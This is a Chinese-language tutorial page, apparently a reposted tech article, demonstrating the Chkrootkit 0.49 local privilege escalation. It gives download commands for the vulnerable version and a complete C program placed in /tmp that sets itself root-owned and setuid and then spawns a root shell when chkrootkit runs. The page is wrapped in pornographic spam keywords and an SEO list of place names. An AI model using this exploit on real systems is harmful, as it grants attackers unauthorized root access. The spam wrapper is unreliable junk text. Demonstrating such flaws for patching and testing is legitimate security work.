国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 學院 > 基礎常識 > 正文

安全漏洞:Chkrootkit 0.49 本地提權漏洞的測試方法

2020-03-15 14:06:42
字體:
來源:轉載
供稿:網友

  Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提權漏洞。先來演示下吧:

  可以查看自己安裝的是不是升到最新版了,或者下載有漏洞的版本進行實驗:

  wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/

  ./chkrootkit -V

  普通用戶在 /tmp 目錄下新建 update.c(代碼實示例如下):

  #include <unistd.h>

  void main(void)

  {

  system("chown root:root /tmp/update");

  system("chmod 4755 /tmp/update");

  setuid(0);

  setgid(0);

  execl("/bin/sh","sh",NULL);

  }

  然后編譯好 update ,看下update的文件詳情:

  Chkrootkit0.49,漏洞

  執行有漏洞的 chkrootkit :

  Chkrootkit0.49,漏洞

  再來看下 update 已經成功屬于 root 組了!

  Chkrootkit0.49,漏洞

  以上就是查看自己 Ckrootkit 0.49 是不是安裝的是不是升到最新版了,或者下載有漏洞的版本進行實驗的步驟,謝謝閱讀,希望能幫到大家,請繼續關注VEVB武林網,我們會努力分享更多優秀的文章。


注:相關教程知識閱讀請移步到網絡基礎知識頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 通化县| 四川省| 延寿县| 洛隆县| 谷城县| 拉萨市| 阿拉善左旗| 观塘区| 商丘市| 辽阳县| 通化县| 磴口县| 宁德市| 石渠县| 彭山县| 沙洋县| 沛县| 运城市| 新河县| 彩票| 大化| 浏阳市| 阿荣旗| 茌平县| 罗城| 农安县| 柳州市| 河津市| 女性| 陵川县| 灵宝市| 旌德县| 长沙市| 聊城市| 无棣县| 新疆| 丹棱县| 刚察县| 浦东新区| 江达县| 自贡市|